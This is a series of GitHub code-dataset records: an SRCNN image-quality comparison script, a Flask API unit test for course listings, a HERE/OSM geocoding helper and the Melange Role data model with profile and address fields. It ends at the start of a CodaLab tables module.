cv2.COLOR_BGR2YCrCb)[self.pad:-self.pad, self.pad:-self.pad, 0]\r\n        self.img_srcnn = self.img_srcnn.astype('float')\r\n\r\n        im = cv2.imread(img_srcnn_np, cv2.IMREAD_COLOR)\r\n        self.img_srcnn_np = cv2.cvtColor(im, cv2.COLOR_BGR2YCrCb)[self.pad:-self.pad, self.pad:-self.pad, 0]\r\n        self.img_srcnn_np = self.img_srcnn_np.astype('float')\r\n\r\n        # Compare PSNR\r\n        p0 = self.psnr(self.img_orig, self.img_cubic)\r\n        p1 = self.psnr(self.img_orig, self.img_srcnn)\r\n        p2 = self.psnr(self.img_orig, self.img_srcnn_np)\r\n        d0 = 100.0*(p1-p0)/p0\r\n        d1 = 100.0*(p2-p0)/p0\r\n        print(img_orig.split(\"/\")[-1], \"Dimensions:\", self.img_orig.shape)\r\n        print(\"PSNR cubic: %f srcnn   : %f Improvement: %f percent\"%(p0, p1, d0))\r\n        print(\"PSNR cubic: %f srcnn_np: %f Improvement: %f percent\"%(p0, p2, d1))\r\n\r\n        # Compare SSIM\r\n        p0 = self.ssim(self.img_orig, self.img_cubic)\r\n        p1 = self.ssim(self.img_orig, self.img_srcnn)\r\n        p2 = self.ssim(self.img_orig, self.img_srcnn_np)\r\n        print(\"SSIM cubic: %f srcnn   : %f delta: 
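The psnr method above implements the standard 8-bit formula 20*log10(255/sqrt(MSE)). A self-contained worked example on toy arrays (not images from the repo):

import numpy as np

def psnr(im1, im2):
    # 20 * log10(MAX / sqrt(MSE)) with MAX = 255 for 8-bit images.
    mse = np.mean((np.asarray(im1, float) - np.asarray(im2, float)) ** 2)
    return 20 * np.log10(255.0 / np.sqrt(mse))

a = np.full((8, 8), 100.0)
b = a + 5.0        # uniform error of 5 gray levels -> MSE = 25
print(psnr(a, b))  # 20*log10(255/5) ~= 34.15 dB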
%f\"%(p0, p1, p1-p0))\r\n print(\"SSIM cubic: %f srcnn_np: %f delta: %f\"%(p0, p2, p2-p0))\r\n\r\n # Compare MSE\r\n p0 = np.mean(np.square(self.img_orig - self.img_cubic))\r\n p1 = np.mean(np.square(self.img_orig - self.img_srcnn))\r\n p2 = np.mean(np.square(self.img_orig - self.img_srcnn_np))\r\n d0 = 100.0*(p1-p0)/p0\r\n d1 = 100.0*(p2-p0)/p0\r\n print(\"MSE cubic: %f srcnn : %f Delta: %f percent\"%(p0, p1, d0))\r\n print(\"MSE cubic: %f srcnn_np: %f Delta: %f percent\"%(p0, p2, d1))\r\n\r\n\r\n \r\nif __name__ == \"__main__\":\r\n obj = Utils()\r\n obj.compare_images( img_orig=\"../dataset/Test/Set5/butterfly_GT.bmp\", \r\n img_cubic=\"./data/butterfly_GT_cubic.jpg\",\r\n img_srcnn=\"./data/butterfly_GT_srcnn.jpg\",\r\n img_srcnn_np=\"./data/butterfly_GT_srcnn_np.jpg\")\r\n obj.compare_images( img_orig=\"../dataset/Test/Set14/monarch.bmp\", \r\n img_cubic=\"./data/monarch_cubic.jpg\",\r\n img_srcnn=\"./data/monarch_srcnn.jpg\",\r\n img_srcnn_np=\"./data/monarch_srcnn_np.jpg\")\r\n obj.compare_images( img_orig=\"../dataset/Test/Set14/everest.jpg\", \r\n img_cubic=\"./data/everest_cubic.jpg\",\r\n img_srcnn=\"./data/everest_srcnn.jpg\",\r\n img_srcnn_np=\"./data/everest_srcnn_np.jpg\")\r\n ","repo_name":"rajeevpatwari/srcnn","sub_path":"pysrc/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23248472299","text":"import contextlib\nimport json\n\nfrom server.blueprints.pre_enrolment.services.pre_enrolment_service import (\n PreEnrolmentService,\n)\nfrom unittest.mock import Mock\nimport unittest\n\nfrom server_tests.database_test_utils import WithApp\nfrom server_tests.mothers.course_mother import CourseMother\n\nPRE_ENROLMENT_URL = \"/pre-enrolment/v1/courses\"\n\n\nclass TestPreEnrolmentPost(WithApp):\n def setUp(self):\n super().setUp()\n\n self.courses = [\n CourseMother.published(id_=\"1\"),\n CourseMother.published(id_=\"2\"),\n CourseMother.published(id_=\"3\"),\n ]\n\n self.pre_enrolment_service_mock = Mock(spec=PreEnrolmentService)\n self.pre_enrolment_service_mock.get_published_courses.return_value = (\n self.courses\n )\n\n @contextlib.contextmanager\n def override_pre_enrolment_service(self):\n \"\"\"shortcut for overriding the pre enrolment service with the mock\"\"\"\n with self.app.container.pre_enrolment_service.override(\n self.pre_enrolment_service_mock\n ) as ctx:\n yield ctx\n\n def test_returns_empty_list_if_no_courses(self):\n # Arrange\n self.pre_enrolment_service_mock.get_published_courses.return_value = []\n expected_result = []\n\n # Act\n with self.override_pre_enrolment_service():\n r = self.client.get(PRE_ENROLMENT_URL, json=None)\n\n # Assert\n self.assertEqual(r.status_code, 200)\n self.assertEqual(json.loads(r.get_data(as_text=True)), expected_result)\n\n def test_returns_courses(self):\n # Arrange\n expected_count = len(self.courses)\n expected_ids = [c.id for c in self.courses]\n\n # Act\n with self.override_pre_enrolment_service():\n r = self.client.get(PRE_ENROLMENT_URL, json=None)\n\n # Assert\n self.assertEqual(r.status_code, 200)\n self.assertEqual(len(json.loads(r.get_data(as_text=True))), expected_count)\n self.assertEqual(\n [c[\"id\"] for c in json.loads(r.get_data(as_text=True))], expected_ids\n )\n\n def test_not_returns_private_fields(self):\n # Arrange\n # Act\n with self.override_pre_enrolment_service():\n r = self.client.get(PRE_ENROLMENT_URL, json=None)\n\n # Assert\n for course in 
json.loads(r.get_data(as_text=True)):\n            self.assertNotIn(\"price_term\", course)\n            self.assertNotIn(\"is_published\", course)\n            self.assertNotIn(\"rooms\", course)\n            self.assertNotIn(\"teachers\", course)\n            self.assertNotIn(\"students\", course)\n            self.assertNotIn(\"schedules\", course)\n            self.assertNotIn(\"calendar_id\", course)\n            self.assertNotIn(\"attendances\", course)\n            self.assertNotIn(\"calendar_url\", course)\n\n    def test_only_public_fields_are_returned(self):\n        # Arrange\n        expected_attributes_count = 5\n\n        # Act\n        with self.override_pre_enrolment_service():\n            r = self.client.get(PRE_ENROLMENT_URL, json=None)\n\n        # Assert\n        for course in json.loads(r.get_data(as_text=True)):\n            self.assertEqual(expected_attributes_count, len(course))\n            self.assertIn(\"base_schedules\", course)\n            self.assertIn(\"description\", course)\n            self.assertIn(\"id\", course)\n            self.assertIn(\"labels\", course)\n            self.assertIn(\"name\", course)\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","repo_name":"miquelvir/centrifuga4","sub_path":"server_tests/unit_tests/blueprints_tests/pre_enrolment_tests/resources_tests/courses_test.py","file_name":"courses_test.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
{"seq_id":"778695099","text":"import requests\r\nimport re\r\nimport json\r\nimport here_wrapper as here\r\nimport osm_wrapper as osm\r\nimport mysql.connector as mariadb\r\nimport geopandas as gpd\r\n\r\nfrom shapely.geometry import Point\r\nfrom common import get_null_obj, conf, get_geocode_df\r\n\r\nfp = 'shapefile/Com01012020_g/Com01012020_g_WGS84.shp'\r\nshp = gpd.read_file(fp)\r\nshp = shp.to_crs(\"EPSG:4326\")\r\n\r\ncodici_istati_df = get_geocode_df()\r\n\r\ndef get_latlon(par, limit_result=None):\r\n    '''\r\n    1. First try to enrich through HERE. If content is empty, fall back to OSM.\r\n    '''\r\n\r\n    get_string, content = here.geocode(par)\r\n    geocode_service = \"HERE\"\r\n    if content == []:\r\n\r\n        get_string, content = osm.geocode(par)\r\n        geocode_service = \"OSM\"\r\n\r\n        if content == []:\r\n            get_string = {'here': here.compose_request(conf, par), 'osm': osm.compose_request(par)}\r\n            geocode_service = \"\"\r\n            content = [get_null_obj()]\r\n            limit_result = 1\r\n\r\n    return {'req':get_string, \r\n            'resp':content[:limit_result],\r\n            'geocode_service':geocode_service\r\n            }\r\n\r\n\r\ndef reverse_geocode(lat, lng):\r\n    \r\n    pt = Point(lng, lat)\r\n\r\n    record = None\r\n    \r\n    for ix, row in shp.iterrows():\r\n        if row[\"geometry\"].contains(pt):\r\n            pro_com = row[\"PRO_COM\"]\r\n            \r\n            record = codici_istati_df.query('codice_istat_comune == {}'.format(pro_com))\r\n            \r\n            record = record.iloc[0,:]\r\n\r\n    \r\n    if record is not None:\r\n        response = {\r\n            'request':{\r\n                'latitudine':lat,\r\n                'longitudine':lng\r\n            }, \r\n            'response':{\r\n                'id_regione':int(record[0]), \r\n                'regione':record[1], \r\n                'id_provincia':int(record[2]), \r\n                'provincia':record[3], \r\n                'sigla':record[4], \r\n                'id_comune':str(record[5]), \r\n                'comune':record[6], \r\n                'centroide':{\r\n                    'latitudine': record[8], \r\n                    'longitudine': record[7]\r\n                }\r\n            }\r\n        }\r\n    else:\r\n        response = [] \r\n\r\n    return response","repo_name":"mattcond/geocode","sub_path":"geocode_function.py","file_name":"geocode_function.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"10264304983","text":"__authors__ = [\n  '\"Daniel Hans\" ',\n  '\"Todd Larsen\" ',\n  '\"Sverre Rabbelier\" ',\n  '\"Pawel Solyga\" ',\n]\n\n\nfrom google.appengine.ext import db\n\nfrom django.utils.translation import ugettext\n\nfrom soc.models import countries\n\nimport soc.models.base\nimport soc.models.linkable\nimport soc.models.school\nimport soc.models.user\n\n\nclass StudentInfo(soc.models.base.ModelWithFieldAttributes):\n  \"\"\"The model which contains some detailed information which is necessary\n  only when the user has a student role. \n  \"\"\"\n\n  school_name = db.StringProperty(required=True, \n      verbose_name=ugettext('School Name'))\n  school_name.group = ugettext(\"5. Education\")\n  school_name.help_text = ugettext(\n      'Please enter the full name of your school, college or university in'\n      ' this field. Please use the complete formal name of your school, e.g.'\n      ' UC Berkeley instead of Cal or UCB. It would be most wonderful if you'\n      ' could provide your school\\'s name in English, as all the program '\n      'administrators speak English as their first language and it will make'\n      ' it much easier for us to assemble program statistics, etc., later if'\n      ' we can easily read the name of your school.')\n\n  school_country = db.StringProperty(required=True,\n      verbose_name=ugettext('School Country/Territory'),\n      choices=countries.COUNTRIES_AND_TERRITORIES)\n  school_country.group = ugettext(\"5. Education\")\n\n  #: School home page URL, not required here but enforced in the form for\n  #: backwards compatibility.\n  school_home_page = db.LinkProperty(\n      required=False, verbose_name=ugettext(\"School Home Page URL\"))\n  school_home_page.group = ugettext(\"5. Education\")\n\n  #: School type can be only High school for GCI and can be University\n  #: for GSoC.\n  school_type = db.StringProperty(required=False,\n      verbose_name=ugettext('School Type'),\n      choices=['University', 'High School'])\n  school_type.group = ugettext(\"5. 
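reverse_geocode above hinges on shapely's containment test against each municipality polygon. A toy illustration with a unit square instead of the real geometries:

from shapely.geometry import Point, Polygon

square = Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
print(square.contains(Point(0.5, 0.5)))  # True  -> point falls inside
print(square.contains(Point(2.0, 0.5)))  # False -> point falls outside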
Education\")\n\n major = db.StringProperty(required=False,\n verbose_name=ugettext('Major Subject'))\n major.group = ugettext(\"5. Education\")\n\n degree = db.StringProperty(required=False,\n verbose_name=ugettext('Degree'),\n choices=['Undergraduate', 'Master', 'PhD'])\n degree.group = ugettext(\"5. Education\")\n\n expected_graduation = db.IntegerProperty(required=True,\n verbose_name=ugettext('Expected Graduation Year'))\n expected_graduation.help_text = ugettext(\"Pick your expected graduation year\")\n expected_graduation.group = ugettext(\"5. Education\")\n\n #: A many:1 relationship that ties multiple Students to the\n #: School that they attend.\n school = db.ReferenceProperty(reference_class=soc.models.school.School,\n required=False, collection_name='students')\n\n\nclass Role(soc.models.linkable.Linkable):\n \"\"\"Information common to Program participation for all Roles.\n\n Some details of a Role are considered \"public\" information, and nearly\n all of these are optional (except for given_name, surname, and email).\n Other details of a Role are kept \"private\" and are only provided to\n other Users in roles that \"need to know\" this information. How these\n fields are revealed is usually covered by Program terms of service.\n\n Role is the entity that is created when a User actually participates\n in some fashion in a Program. Role details could *possibly* be collected\n without actual participation (voluntary, opt-in, of course).\n\n A Role is a User's participation in a single Program. To avoid\n duplication of data entry, facilities will be available for selecting\n an existing Role associated with a particular User to be duplicated for\n participation in a new Program.\n\n A User has to have at least one Role in order to be able to create\n any Work (such as a Document) on the site. The easiest-to-obtain Role is\n probably Club Member (though Clubs can set their own membership criteria).\n\n A Role entity participates in the following relationships implemented\n as a db.ReferenceProperty elsewhere in another db.Model:\n\n documentation) a 1:many relationship of Documentation (tax forms,\n letters from schools, etc.) associated with the Role by Hosts. This\n relation is implemented as the 'documentation' back-reference Query of\n the Documentation model 'role' reference.\n\n works) a many:many relationship with Works, stored in a separate\n WorksRoles model, representing the Work authored by this Role.\n See the WorksRoles model class for details.\n \"\"\"\n\n #: A required many:1 relationship that ties (possibly multiple\n #: entities of) Role details to a unique User. A Role cannot\n #: exist unassociated from a login identity and credentials. The\n #: back-reference in the User model is a Query named 'roles'.\n user = db.ReferenceProperty(reference_class=soc.models.user.User,\n required=True, collection_name='roles')\n\n\n #====================================================================\n # (public) name information\n #====================================================================\n\n #: Required field storing the parts of the Role's name\n #: corresponding to the field names; displayed publicly.\n #: given_name can only be ASCII, not UTF-8 text, because it is\n #: used, for example, as part of the shipping (mailing) address.\n given_name = db.StringProperty(required=True,\n verbose_name=ugettext('First (given) name'))\n given_name.help_text = ugettext('only A-z, 0-9 and whitespace characters')\n given_name.group = ugettext(\"1. 
Public Info\")\n\n #: Required field storing the parts of the Role's name\n #: corresponding to the field names; displayed publicly.\n #: Surname can only be ASCII, not UTF-8 text, because it is\n #: used, for example, as part of the shipping (mailing) address.\n surname = db.StringProperty(\n required=True,\n verbose_name=ugettext('Last (family) name'))\n surname.help_text = ugettext('only A-z, 0-9 and whitespace characters')\n surname.group = ugettext(\"1. Public Info\")\n\n #: Optional field used as a display name, such as for awards\n #: certificates. Should be the entire name in the format\n #: the Role would like it displayed (could be surname followed by\n #: given name in some cultures, for example). Display names can be\n #: any valid UTF-8 text.\n name_on_documents = db.StringProperty(\n verbose_name=ugettext('Name on documents'))\n name_on_documents.help_text = ugettext(\n 'Optional field used as a display name, such as for documents like '\n 'awards certificates. Should be the entire name in the format '\n 'the person would like it displayed (could be family name followed '\n 'by given name in some cultures, for example). Name on documents can be '\n 'any valid UTF-8 text.')\n name_on_documents.group = ugettext(\"1. Public Info\")\n\n #====================================================================\n # (public) contact information\n #====================================================================\n\n #: Optional field storing Instant Messaging network; displayed publicly.\n im_network = db.StringProperty(\n verbose_name=ugettext('IM Network'))\n im_network.help_text = ugettext(\n 'examples: irc:irc.freenode.net xmpp:gmail.com/Home')\n im_network.group = ugettext(\"1. Public Info\")\n\n #: Optional field storing Instant Messaging handle; displayed publicly.\n im_handle = db.StringProperty(\n verbose_name=ugettext('IM Handle'))\n im_handle.help_text = ugettext(\n 'personal identifier, such as: screen name, IRC nick, user name')\n im_handle.group = ugettext(\"1. Public Info\")\n\n #: Optional field storing a home page URL; displayed publicly.\n home_page = db.LinkProperty(\n verbose_name=ugettext('Home Page URL'))\n home_page.group = ugettext(\"1. Public Info\")\n\n #: Optional field storing a blog URL; displayed publicly.\n blog = db.LinkProperty(\n verbose_name=ugettext('Blog URL'))\n blog.group = ugettext(\"1. Public Info\")\n\n #: Optional field storing a URL to an image, expected to be a\n #: personal photo (or cartoon avatar, perhaps); displayed publicly.\n photo_url = db.LinkProperty(\n verbose_name=ugettext('Thumbnail Photo URL'))\n photo_url.help_text = ugettext(\n 'URL of 64x64 pixel thumbnail image')\n photo_url.group = ugettext(\"1. Public Info\")\n\n #====================================================================\n # (private) contact information\n #====================================================================\n\n #: Optional field storing the latitude provided by the Role; displayed\n #: publicly.\n latitude = db.FloatProperty(\n verbose_name=ugettext('Latitude'))\n latitude.help_text = ugettext(\n 'decimal degrees northerly (N), use minus sign (-) for southerly (S)')\n latitude.group = ugettext(\"2. Location Info\")\n\n #: Optional field storing the longitude provided by the Role; displayed\n #: publicly.\n longitude = db.FloatProperty(\n verbose_name=ugettext('Longitude'))\n longitude.help_text = ugettext(\n 'decimal degrees easterly (E), use minus sign (-) for westerly (W)')\n longitude.group = ugettext(\"2. 
Location Info\")\n\n #: field storing whether the User has agreed to publish his location\n publish_location = db.BooleanProperty(required=False, default=False,\n verbose_name=ugettext('Publish my location'))\n publish_location.help_text = ugettext(\n 'By checking this box, you are agreeing to allow your location to be'\n ' displayed, as given by the Marker below, on any map.'\n ' For instance on the map linking Students to Mentors or'\n ' by showing your location on your public profile page in the system.')\n publish_location.example_text = ugettext('You can set your location below')\n publish_location.group = ugettext(\"2. Location Info\")\n\n #: Required field used as the contact mechanism for the program\n #: Role (for example the address the system sends emails to).\n email = db.EmailProperty(\n required=True,\n verbose_name=ugettext('Email Address'))\n email.group = ugettext(\"2. Contact Info (Private)\")\n\n #: Required field containing residence street address; kept private.\n #: Residence street address can only be ASCII, not UTF-8 text, because\n #: it may be used as a shipping address.\n res_street = db.StringProperty(required=True,\n verbose_name=ugettext('Street Address 1'))\n res_street.help_text = ugettext(\n 'street number and name, '\n 'only A-z, 0-9 and whitespace characters')\n res_street.group = ugettext(\"2. Contact Info (Private)\")\n\n #: Optional field containing the 2nd line for the residence street address;\n #: kept private.\n #: Can only be ASCII, not UTF-8 text, because\n #: it may be used as a shipping address.\n res_street_extra = db.StringProperty(required=False,\n verbose_name=ugettext('Street Address 2'))\n res_street_extra.help_text = ugettext(\n '2nd address line usually for apartment numbers. '\n 'only A-z, 0-9 and whitespace characters')\n res_street_extra.group = ugettext(\"2. Contact Info (Private)\")\n\n #: Required field containing residence address city; kept private.\n #: Residence city can only be ASCII, not UTF-8 text, because it\n #: may be used as a shipping address.\n res_city = db.StringProperty(required=True,\n verbose_name=ugettext('City'))\n res_city.help_text = ugettext(\n 'only A-z, 0-9 and whitespace characters')\n res_city.group = ugettext(\"2. Contact Info (Private)\")\n\n #: Optional field containing residence address state or province; kept\n #: private. Residence state/province can only be ASCII, not UTF-8\n #: text, because it may be used as a shipping address.\n res_state = db.StringProperty(\n verbose_name=ugettext('State/Province'))\n res_state.help_text = ugettext(\n 'optional if country/territory does not have states or provinces, '\n 'only A-z, 0-9 and whitespace characters')\n res_state.group = ugettext(\"2. Contact Info (Private)\")\n\n #: Required field containing residence address country or territory; kept\n #: private.\n res_country = db.StringProperty(required=True,\n verbose_name=ugettext('Country/Territory'),\n choices=countries.COUNTRIES_AND_TERRITORIES)\n res_country.group = ugettext(\"2. Contact Info (Private)\")\n\n #: Required field containing residence address postal code (ZIP code in\n #: the United States); kept private. Residence postal code can only be\n #: ASCII, not UTF-8 text, because it may be used as a shipping address.\n res_postalcode = db.StringProperty(required=True,\n verbose_name=ugettext('ZIP/Postal Code'))\n res_postalcode.help_text = ugettext(\n 'only A-z, 0-9 and whitespace characters')\n res_postalcode.group = ugettext(\"2. 
Contact Info (Private)\")\n\n #: Required field containing a phone number that will be used to\n #: contact the user, also supplied to shippers; kept private.\n phone = db.PhoneNumberProperty(\n required=True,\n verbose_name=ugettext('Phone Number'))\n phone.help_text = ugettext(\n 'include complete international calling number with country code, '\n 'use numbers only')\n phone.example_text = ugettext(\n \"e.g. 1650253000 for Google's Corp HQ number in the United States\")\n phone.group = ugettext(\"2. Contact Info (Private)\")\n\n #: Optional field containing a separate recipient name; kept\n #: private. Recipient name can only be ASCII, not UTF-8 text\n ship_name = db.StringProperty(\n verbose_name=ugettext('Full Recipient Name'))\n ship_name.example_text = ugettext(\n 'Make sure to complete all fields if differs from contact address')\n ship_name.help_text = ugettext(\n 'Fill in the name of the person who should be receiving your packages. '\n 'Fill in only if you want your shipping address to differ from your '\n 'contact address.')\n ship_name.group = ugettext(\"3. Shipping Info (Private and Optional)\")\n\n #: Optional field containing a separate shipping street address; kept\n #: private. If shipping address is not present in its entirety, the\n #: residence address will be used instead. Shipping street address can only\n #: be ASCII, not UTF-8 text, because, if supplied, it is used as a\n #: shipping address.\n ship_street = db.StringProperty(\n verbose_name=ugettext('Shipping Street Address 1'))\n ship_street.help_text = ugettext(\n 'street number and name, '\n 'only A-z, 0-9 and whitespace characters. '\n 'Fill in only if you want your shipping address to differ from your '\n 'contact address.')\n ship_street.group = ugettext(\"3. Shipping Info (Private and Optional)\")\n\n #: Optional field containing a 2nd line for the shipping street address; kept\n #: private. If shipping address is not present in its entirety, the\n #: residence address will be used instead. Shipping street address can only\n #: be ASCII, not UTF-8 text, because, if supplied, it is used as a\n #: shipping address.\n ship_street_extra = db.StringProperty(\n verbose_name=ugettext('Shipping Street Address 2'))\n ship_street_extra.help_text = ugettext(\n '2nd address line usually used for apartment numbers, '\n 'only A-z, 0-9 and whitespace characters. '\n 'Fill in only if you want your shipping address to differ from your '\n 'contact address.')\n ship_street_extra.group = ugettext(\"3. Shipping Info (Private and Optional)\")\n\n #: Optional field containing shipping address city; kept private.\n #: Shipping city can only be ASCII, not UTF-8 text, because, if\n #: supplied, it is used as a shipping address.\n ship_city = db.StringProperty(\n verbose_name=ugettext('Shipping City'))\n ship_city.help_text = ugettext(\n 'Only A-z, 0-9 and whitespace characters. '\n 'Fill in only if you want your shipping address to differ from your '\n 'contact address.')\n ship_city.group = ugettext(\"3. Shipping Info (Private and Optional)\")\n\n #: Optional field containing shipping address state or province; kept\n #: private. Shipping state/province can only be ASCII, not UTF-8\n #: text, because, if supplied, it is used as a shipping address.\n ship_state = db.StringProperty(\n verbose_name=ugettext('Shipping State/Province'))\n ship_state.help_text = ugettext(\n 'optional if country/territory does not have states or provinces, '\n 'only A-z, 0-9 and whitespace characters. 
'\n 'fill in only if you want your shipping address to differ from your '\n 'contact address.')\n ship_state.group = ugettext(\"3. Shipping Info (Private and Optional)\")\n\n #: Optional field containing shipping address country or territory; kept\n #: private.\n ship_country = db.StringProperty(\n verbose_name=ugettext('Shipping Country/Territory'),\n choices=countries.COUNTRIES_AND_TERRITORIES)\n ship_country.help_text = ugettext(\n 'Fill in only if you want your shipping address to differ from your '\n 'contact address.')\n ship_country.group = ugettext(\"3. Shipping Info (Private and Optional)\")\n\n #: Optional field containing shipping address postal code (ZIP code in\n #: the United States); kept private. Shipping postal code can only be\n #: ASCII, not UTF-8 text, because, if supplied, it is used as a\n #: shipping address.\n ship_postalcode = db.StringProperty(\n verbose_name=ugettext('Shipping ZIP/Postal Code'))\n ship_postalcode.help_text = ugettext(\n 'only A-z, 0-9 and whitespace characters,'\n 'fill in only if not same as above')\n ship_postalcode.group = ugettext(\"3. Shipping Info (Private and Optional)\")\n\n #====================================================================\n # (private) personal information\n #====================================================================\n\n #: Required field containing the Role's birthdate (for\n #: determining Program participation eligibility); kept private.\n birth_date = db.DateProperty(\n required=True,\n verbose_name=ugettext('Birth Date'))\n birth_date.help_text = ugettext(\n 'format YYYY-MM-DD, required for determining program eligibility')\n birth_date.group = ugettext(\"4. Private Info\")\n birth_date.example_text = ugettext(\n 'e.g. 1999-12-31 or 12/31/1999')\n\n #: Optional field indicating choice of t-shirt fit; kept private.\n tshirt_style = db.StringProperty(\n verbose_name=ugettext('T-shirt Style'),\n choices=('male', 'female'))\n tshirt_style.group = ugettext(\"4. Private Info\")\n\n #: Optional field indicating choice of t-shirt, from XXS to XXXL;\n #: kept private.\n tshirt_size = db.StringProperty(\n verbose_name=ugettext('T-shirt Size'),\n choices=('XXS', 'XS', 'S', 'M', 'L', 'XL', 'XXL', 'XXXL'))\n tshirt_size.group = ugettext(\"4. Private Info\")\n tshirt_size.example_text = ugettext('See also '\n ' for women and '\n 'for men.')\n\n #: Optional field indicating gender;\n #: kept private.\n gender = db.StringProperty(\n verbose_name=ugettext('Gender'),\n choices=('male', 'female', 'other'))\n gender.group = ugettext(\"4. Private Info\")\n\n #: Property to gain insight into where students heard about this program\n program_knowledge = db.TextProperty(required=False, verbose_name=ugettext(\n \"How did you hear about this program?\"))\n program_knowledge.help_text = ugettext(\"Please be as \"\n \"specific as possible, e.g. blog post (include URL if possible), mailing \"\n \"list (please include list address), information session (please include \"\n \"location and speakers if you can), etc.\")\n program_knowledge.group = ugettext(\"4. 
Private Info\")\n\n #: field storing wheter the User has agreed to the site-wide Terms of Service.\n #: (Not a required field because the Terms of Service might not be present\n #: when the first User profile is created when bootstrapping the site.)\n agreed_to_tos = db.BooleanProperty(required=False, default=False,\n verbose_name=ugettext('I Agree to the Terms of Service'))\n agreed_to_tos.help_text = ugettext(\n 'Indicates whether the user agreed to this role Terms of Service.')\n agreed_to_tos.group = ugettext(\"99. Terms of Service\")\n\n #: field storing when the User has agreed to the site-wide Terms of Service.\n #: (Not a required field because the Terms of Service might not be present\n #: when the first User profile is created when bootstrapping the site.)\n agreed_to_tos_on = db.DateTimeProperty(required=False, default=None,\n verbose_name=ugettext('Has agreed to the Terms of Service on'))\n agreed_to_tos_on.help_text = ugettext(\n 'Indicates when the user agreed to this role Terms of Service.')\n agreed_to_tos.group = ugettext(\"99. Terms of Service\")\n\n #: field storing the status of this role\n #: Active means that this role can exercise all it's privileges.\n #: Invalid mean that this role cannot exercise it's privileges.\n #: Inactive means that this role cannot exercise it's data-editing\n #: privileges but should be able to see the data. For instance when a program\n #: has been marked inactive an Organization Admin should still be able to see\n #: the student applications.\n status = db.StringProperty(default='active',\n choices=['active','invalid','inactive'],\n verbose_name=ugettext('Status of this Role'))\n status.help_text = ugettext('Indicates the status of the role '\n 'concerning which privileges may be used.')\n\n #====================================================================\n #specific roles information\n #====================================================================\n\n #: List of organizations that the user with the role is a mentor for\n mentor_for = db.ListProperty(item_type=db.Key, default=[])\n mentor_for.help_text = ugettext('List of organizations for which the user '\n 'is a mentor.')\n\n #: List of organizations that the user with the role is an org admin for\n org_admin_for = db.ListProperty(item_type=db.Key, default=[])\n org_admin_for.help_text = ugettext('List of organizations for which '\n 'the user is an organization admin.')\n\n #: Points to student specific information if the user has a student role\n student_info = db.ReferenceProperty(required=False, default=None,\n reference_class=StudentInfo)\n\n def name(self):\n \"\"\"Property as 'name' for use in common templates.\n \"\"\"\n return '%s %s' % (self.given_name, self.surname)\n\n def document_name(self):\n \"\"\"Property as 'document_name' used on for example award certificates.\n \"\"\"\n if self.name_on_documents:\n return self.name_on_documents\n else:\n return self.name()\n\n def recipient_name(self):\n \"\"\"Property recipient_name that returns the name used for shipping.\n\n Does not check hasShippingAddress because this field was added later and\n would be None for old roles.\n \"\"\"\n return self.ship_name if self.ship_name else self.name()\n\n def shipping_street(self):\n \"\"\"Property shipping_street that returns shipping street if\n shipping address is set else the residential street.\n \"\"\"\n return self.ship_street if self.hasShippingAddress() else self.res_street\n\n def shipping_street_extra(self):\n \"\"\"Property shipping_street_extra that returns the 
2nd shipping address line\n if shipping address is set else the residential 2nd address line.\n \"\"\"\n return self.ship_street_extra if self.hasShippingAddress() else \\\n self.res_street_extra\n\n def shipping_city(self):\n \"\"\"Property shipping_city that returns shipping city if\n shipping address is set else the residential city.\n \"\"\"\n return self.ship_city if self.hasShippingAddress() else self.res_city\n\n def shipping_state(self):\n \"\"\"Property shipping_state that returns shipping state if\n shipping address is set else the residential state.\n \"\"\"\n return self.ship_state if self.hasShippingAddress() else self.res_state\n\n def shipping_country(self):\n \"\"\"Property shipping_country that returns shipping country if\n shipping address is set else the residential country.\n \"\"\"\n return self.ship_country if self.hasShippingAddress() else self.res_country\n\n def shipping_postalcode(self):\n \"\"\"Property shipping_postalcode that returns the shipping postal code if\n shipping address set else the residential postal code.\n \"\"\"\n return self.ship_postalcode if self.hasShippingAddress() else \\\n self.res_postalcode\n\n def hasShippingAddress(self):\n \"\"\"Checks if the required fields for the shipping address are set.\n \"\"\"\n return self.ship_city and self.ship_country and self.ship_postalcode and \\\n self.ship_street\n\n def ccTld(self):\n \"\"\"Property as 'ccTld' for use in Maps.\n \"\"\"\n return countries.COUNTRIES_TO_CCTLD[self.res_country]\n\n\nclass Profile(Role):\n \"\"\"New name for Role.\n \"\"\"\n pass\n","repo_name":"SRabbelier/Melange","sub_path":"app/soc/models/role.py","file_name":"role.py","file_ext":"py","file_size_in_byte":24755,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"34554808658","text":"\"\"\"\nThe SQLAlchemy table objects for the CodaLab bundle system tables.\n\"\"\"\n# TODO: Replace String and Text columns with Unicode and UnicodeText as appropriate\n# This way, SQLAlchemy will automatically perform conversions to and from UTF-8\n# encoding, or use appropriate database engine-specific data types for Unicode\n# data. 
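The shipping_* accessors above all reduce to one rule: use the shipping value only when every required shipping field is present, otherwise fall back to the residential one. The same logic in a dependency-free sketch (dict-based stand-in, not the real model):

class AddressFallback:
    # Plain-Python restatement of hasShippingAddress() + shipping_*().
    def __init__(self, res, ship=None):
        self.res = res
        self.ship = ship or {}

    def has_shipping_address(self):
        required = ("street", "city", "country", "postalcode")
        return all(self.ship.get(k) for k in required)

    def shipping(self, field):
        return self.ship[field] if self.has_shipping_address() else self.res[field]

r = AddressFallback(res={"street": "1 Main St", "city": "Springfield",
                         "country": "US", "postalcode": "12345"})
print(r.shipping("city"))  # no complete shipping address -> "Springfield"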
